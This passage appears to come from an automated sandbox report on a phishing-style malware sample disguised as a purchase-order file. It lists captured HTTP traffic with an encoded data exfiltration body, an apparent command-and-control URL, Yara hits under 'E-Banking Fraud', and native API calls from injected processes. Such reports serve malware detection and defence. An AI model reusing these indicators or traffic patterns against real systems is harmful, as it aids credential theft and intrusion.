    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Host: www.17jkgl.com
    Origin: http://www.17jkgl.com
    Referer: http://www.17jkgl.com/yjgs/
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Cache-Control: no-cache
    Content-Length: 200
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
    Data Ascii: LRW=0NNFlb2Eb+w7ItmEmp4plPYzTZNTEtGDNhMTSxWNow0A97VA703R235VF+HLYdLTnyulwqg3sStBZR44NADpyN/NK6PTzTRQSRpgg0oMeaneQy8V6y69nupKE4dkSwICPOrqe44OBT1Qw8JKHLnzTuTSGOXHIz+QvDuUXu3nAQQkUe4pX8TxxnQBMjmIyo4Z4g==
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Wed, 27 Nov 2024 15:43:19 GMTContent-Length: 0Connection: closeWAFRule: 5
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Wed, 27 Nov 2024 15:43:44 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeContent-Length: 0Content-Type: text/html; charset=utf-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 15:58:24 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4794Content-Type: text/html; charset=utf-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 15:58:32 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: runas.exe, 00000012.00000002.2943817151.000000000550C000.00000004.10000000.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.000000000387C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://elinor.club/7plr/?fvqp6=9vfXK&LRW=r9AVpTZFPDO8VTu/ciknjINDVEp/PvrjGtBP7U8RvBiODJ3oM2lL
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1805442128.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, STiokuWkiGFJ.exe, 00000009.00000002.1994696296.000000000274A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: nhClcdOjQwJ.exe, 00000013.00000002.2944930407.0000000005308000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.elinor.club
                      Source: nhClcdOjQwJ.exe, 00000013.00000002.2944930407.0000000005308000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.elinor.club/7plr/
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812739466.000000000607A000.00000004.00000020.00020000.00000000.sdmp, Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: runas.exe, 00000012.00000002.2943817151.000000000537A000.00000004.10000000.00040000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.00000000036EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, 00000000.00000002.1812896356.0000000007232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033-f
                      Source: runas.exe, 00000012.00000002.2941572830.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: runas.exe, 00000012.00000002.2941572830.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: runas.exe, 00000012.00000003.2247650450.0000000007486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: runas.exe, 00000012.00000002.2943817151.00000000051E8000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2945609383.0000000007200000.00000004.00000800.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2943382450.0000000003558000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: runas.exe, 00000012.00000003.2260056368.00000000074AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      E-Banking Fraud

                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0042CCB3 NtClose,8_2_0042CCB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2B60 NtClose,LdrInitializeThunk,8_2_015D2B60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_015D2DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_015D2C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D35C0 NtCreateMutant,LdrInitializeThunk,8_2_015D35C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D4340 NtSetContextThread,8_2_015D4340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D4650 NtSuspendThread,8_2_015D4650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2BF0 NtAllocateVirtualMemory,8_2_015D2BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2BE0 NtQueryValueKey,8_2_015D2BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2B80 NtQueryInformationFile,8_2_015D2B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2BA0 NtEnumerateValueKey,8_2_015D2BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2AD0 NtReadFile,8_2_015D2AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2AF0 NtWriteFile,8_2_015D2AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2AB0 NtWaitForSingleObject,8_2_015D2AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2D10 NtMapViewOfSection,8_2_015D2D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2D00 NtSetInformationFile,8_2_015D2D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2D30 NtUnmapViewOfSection,8_2_015D2D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2DD0 NtDelayExecution,8_2_015D2DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2DB0 NtEnumerateKey,8_2_015D2DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2C60 NtCreateKey,8_2_015D2C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2C00 NtQueryInformationProcess,8_2_015D2C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2CC0 NtQueryVirtualMemory,8_2_015D2CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2CF0 NtOpenProcess,8_2_015D2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2CA0 NtQueryInformationToken,8_2_015D2CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2F60 NtCreateProcessEx,8_2_015D2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2F30 NtCreateSection,8_2_015D2F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2FE0 NtCreateFile,8_2_015D2FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2F90 NtProtectVirtualMemory,8_2_015D2F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2FB0 NtResumeThread,8_2_015D2FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2FA0 NtQuerySection,8_2_015D2FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2E30 NtWriteVirtualMemory,8_2_015D2E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2EE0 NtQueueApcThread,8_2_015D2EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2E80 NtReadVirtualMemory,8_2_015D2E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2EA0 NtAdjustPrivilegesToken,8_2_015D2EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D3010 NtOpenDirectoryObject,8_2_015D3010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D3090 NtSetValueKey,8_2_015D3090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D39B0 NtGetContextThread,8_2_015D39B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D3D70 NtOpenThread,8_2_015D3D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D3D10 NtOpenProcessToken,8_2_015D3D10
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04524650 NtSuspendThread,LdrInitializeThunk,18_2_04524650
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04524340 NtSetContextThread,LdrInitializeThunk,18_2_04524340
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522C70 NtFreeVirtualMemory,LdrInitializeThunk,18_2_04522C70
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522C60 NtCreateKey,LdrInitializeThunk,18_2_04522C60
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522CA0 NtQueryInformationToken,LdrInitializeThunk,18_2_04522CA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522D10 NtMapViewOfSection,LdrInitializeThunk,18_2_04522D10
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522D30 NtUnmapViewOfSection,LdrInitializeThunk,18_2_04522D30
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522DD0 NtDelayExecution,LdrInitializeThunk,18_2_04522DD0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522DF0 NtQuerySystemInformation,LdrInitializeThunk,18_2_04522DF0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522EE0 NtQueueApcThread,LdrInitializeThunk,18_2_04522EE0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522E80 NtReadVirtualMemory,LdrInitializeThunk,18_2_04522E80
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522F30 NtCreateSection,LdrInitializeThunk,18_2_04522F30
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522FE0 NtCreateFile,LdrInitializeThunk,18_2_04522FE0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522FB0 NtResumeThread,LdrInitializeThunk,18_2_04522FB0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522AD0 NtReadFile,LdrInitializeThunk,18_2_04522AD0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522AF0 NtWriteFile,LdrInitializeThunk,18_2_04522AF0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522B60 NtClose,LdrInitializeThunk,18_2_04522B60
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522BF0 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04522BF0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522BE0 NtQueryValueKey,LdrInitializeThunk,18_2_04522BE0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522BA0 NtEnumerateValueKey,LdrInitializeThunk,18_2_04522BA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045235C0 NtCreateMutant,LdrInitializeThunk,18_2_045235C0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_045239B0 NtGetContextThread,LdrInitializeThunk,18_2_045239B0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522C00 NtQueryInformationProcess,18_2_04522C00
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522CC0 NtQueryVirtualMemory,18_2_04522CC0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522CF0 NtOpenProcess,18_2_04522CF0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522D00 NtSetInformationFile,18_2_04522D00
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522DB0 NtEnumerateKey,18_2_04522DB0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522E30 NtWriteVirtualMemory,18_2_04522E30
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522EA0 NtAdjustPrivilegesToken,18_2_04522EA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522F60 NtCreateProcessEx,18_2_04522F60
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522F90 NtProtectVirtualMemory,18_2_04522F90
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522FA0 NtQuerySection,18_2_04522FA0
                      Source: C:\Windows\SysWOW64\runas.exeCode function: 18_2_04522AB0 NtWaitForSingleObject,18_2_04522AB0
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04522B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04523010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04523090 NtSetValueKey
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04523D70 NtOpenThread
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_04523D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_005194A0 NtCreateFile
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_00519610 NtReadFile
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_00519700 NtDeleteFile
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_005197A0 NtClose
Source: C:\Windows\SysWOW64\runas.exe Code function: 18_2_00519900 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe Code function: 0_2_077A1C78
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe Code function: 0_2_077A0040
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe Code function: 0_2_077A1840
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe Code function: 0_2_01334218
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe Code function: 0_2_01336F9F
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe Code function: 0_2_0133D4A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00418BC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_004011F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0040298D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00402990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00403290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0042F2B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_004103E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00402440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0040243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00416D7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00416DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_004025D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0040E5F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00402E7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00410603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00402E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0040E743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0040E738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01628158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01590100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016581CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016541A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016601AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01632000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016603E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01640274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016202C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01660591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01652446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01644420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0164E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0166A9A6
